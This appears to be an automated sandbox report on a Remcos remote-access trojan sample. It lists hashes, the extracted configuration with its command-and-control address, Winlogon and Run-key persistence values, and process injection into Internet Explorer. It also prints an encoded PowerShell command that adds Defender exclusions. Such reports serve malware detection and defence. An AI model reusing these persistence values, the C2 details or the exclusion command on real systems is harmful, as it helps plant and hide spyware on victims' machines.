Analysis
-
max time kernel
93s -
max time network
94s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
13-04-2024 04:32
Static task
static1
Behavioral task
behavioral1
Sample
19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe
Resource
win10v2004-20240412-en
Behavioral task
behavioral2
Sample
19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe
Resource
win11-20240412-en
General
-
Target
19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe
-
Size
203KB
-
MD5
869031d5e7abc377ebe084c375ffdf1e
-
SHA1
89c16a7d8f1b95c4c0a72d7407f43686c329ec9f
-
SHA256
19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7
-
SHA512
c269ef4bf32fbb350b0c25cc6f6a4e570cb8d1a6d9755636a1d879aa24956ebef6d1b5f5cbdd4e1b95531dd55553e77ff82eff398cc37c676d8d705a7b6d05c4
-
SSDEEP
6144:1OSGpTE6C8JaksU4gcet422dSnVE492l9:kSMEfUaMce+22YnV
Malware Config
Extracted
remcos
1.7 Pro
Host
185.241.208.113:2404
-
audio_folder
audio
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
5
-
copy_file
remcos.exe
-
copy_folder
remcos
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
true
-
install_flag
true
-
install_path
%AppData%
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
remcos_tifinqdfds
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screens
-
screenshot_path
%AppData%
-
screenshot_time
1
-
startup_value
remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes:
Backdoor.exeremcos.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\WINDOWS\\system32\\userinit.exe, \"C:\\Users\\Admin\\AppData\\Roaming\\remcos\\remcos.exe\"" Backdoor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\WINDOWS\\system32\\userinit.exe, \"C:\\Users\\Admin\\AppData\\Roaming\\remcos\\remcos.exe\"" remcos.exe -
Executes dropped EXE 2 IoCs
Processes:
Backdoor.exeremcos.exepid process 4148 Backdoor.exe 2548 remcos.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Backdoor.exe upx behavioral2/memory/5032-16-0x00000146F9630000-0x00000146F9640000-memory.dmp upx behavioral2/memory/4148-27-0x0000000000400000-0x000000000041F000-memory.dmp upx behavioral2/memory/4148-31-0x0000000000400000-0x000000000041F000-memory.dmp upx behavioral2/memory/2548-39-0x0000000000400000-0x000000000041F000-memory.dmp upx behavioral2/memory/3500-40-0x0000000000400000-0x000000000041F000-memory.dmp upx behavioral2/memory/2548-41-0x0000000000400000-0x000000000041F000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Backdoor.exeremcos.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Users\\Admin\\AppData\\Roaming\\remcos\\remcos.exe\"" Backdoor.exe Set value (str) \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Users\\Admin\\AppData\\Roaming\\remcos\\remcos.exe\"" remcos.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
Backdoor.exeremcos.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\ Backdoor.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\ remcos.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
remcos.exedescription pid process target process PID 2548 set thread context of 3500 2548 remcos.exe iexplore.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 5032 powershell.exe 5032 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 5032 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exeBackdoor.execmd.exeremcos.exedescription pid process target process PID 3676 wrote to memory of 5032 3676 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe powershell.exe PID 3676 wrote to memory of 5032 3676 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe powershell.exe PID 3676 wrote to memory of 4148 3676 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe Backdoor.exe PID 3676 wrote to memory of 4148 3676 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe Backdoor.exe PID 3676 wrote to memory of 4148 3676 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe Backdoor.exe PID 4148 wrote to memory of 4928 4148 Backdoor.exe cmd.exe PID 4148 wrote to memory of 4928 4148 Backdoor.exe cmd.exe PID 4148 wrote to memory of 4928 4148 Backdoor.exe cmd.exe PID 4928 wrote to memory of 5016 4928 cmd.exe PING.EXE PID 4928 wrote to memory of 5016 4928 cmd.exe PING.EXE PID 4928 wrote to memory of 5016 4928 cmd.exe PING.EXE PID 4928 wrote to memory of 2548 4928 cmd.exe remcos.exe PID 4928 wrote to memory of 2548 4928 cmd.exe remcos.exe PID 4928 wrote to memory of 2548 4928 cmd.exe remcos.exe PID 2548 wrote to memory of 3500 2548 remcos.exe iexplore.exe PID 2548 wrote to memory of 3500 2548 remcos.exe iexplore.exe PID 2548 wrote to memory of 3500 2548 remcos.exe iexplore.exe PID 2548 wrote to memory of 3500 2548 remcos.exe iexplore.exe PID 2548 wrote to memory of 3500 2548 remcos.exe iexplore.exe PID 2548 wrote to memory of 3500 2548 remcos.exe iexplore.exe PID 2548 wrote to memory of 3500 2548 remcos.exe iexplore.exe PID 2548 wrote to memory of 3500 2548 remcos.exe iexplore.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe"C:\Users\Admin\AppData\Local\Temp\19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAYgB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdwBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAbABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AdAB6ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Backdoor.exe"C:\Users\Admin\AppData\Local\Temp\Backdoor.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Modifies WinLogon
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEPING 127.0.0.1 -n 24⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\remcos\remcos.exe"C:\Users\Admin\AppData\Roaming\remcos\remcos.exe"4⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Modifies WinLogon
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"5⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Backdoor.exeFilesize
36KB
MD555d84d2a0ade5786849beb49da4d2186
SHA1c52d358c5deaa50da7cceae0a2e680c0a7b28a08
SHA2561170619b287ca504e5caecf5edb3686df68d1033f34603d6aa8af3b0ab4930c4
SHA5128397221ec3bcfa268e7936681e1f1fb4579f5773e01bd18f12fd9d087fee900a23eeb438f9137efa14d100e85309a9065cf0c8b34e32a3a756957e0b650f3955
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_11wtmtnn.bqi.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.batFilesize
153B
MD51225a650f89a3b93f79854658d1fed4c
SHA184c0280016ea03b48c41bf419a71e5ffb79fd06d
SHA256f5c88eb67d8a378cae42c15984191ac2228aae24dda4379c03603ea6e5e56494
SHA51296567875f2c1573d08441511339063fb6c7d961e3e1bff4a7cf52c1576db93ba33cc36bf7e714d0332bc4da8a00fcad3f626c0f6f6b93a8dd1bcb01449483635
-
memory/2548-41-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/2548-39-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/3500-40-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/3676-1-0x00007FFA711B0000-0x00007FFA71C72000-memory.dmpFilesize
10.8MB
-
memory/3676-2-0x0000000000A10000-0x0000000000A20000-memory.dmpFilesize
64KB
-
memory/3676-0-0x0000000000190000-0x00000000001CA000-memory.dmpFilesize
232KB
-
memory/3676-35-0x00007FFA711B0000-0x00007FFA71C72000-memory.dmpFilesize
10.8MB
-
memory/4148-27-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/4148-31-0x0000000000400000-0x000000000041F000-memory.dmpFilesize
124KB
-
memory/5032-12-0x00007FFA711B0000-0x00007FFA71C72000-memory.dmpFilesize
10.8MB
-
memory/5032-33-0x00007FFA711B0000-0x00007FFA71C72000-memory.dmpFilesize
10.8MB
-
memory/5032-29-0x00000146F9630000-0x00000146F9640000-memory.dmpFilesize
64KB
-
memory/5032-26-0x00000146F9630000-0x00000146F9640000-memory.dmpFilesize
64KB
-
memory/5032-25-0x00000146F95A0000-0x00000146F95C2000-memory.dmpFilesize
136KB
-
memory/5032-16-0x00000146F9630000-0x00000146F9640000-memory.dmpFilesize
64KB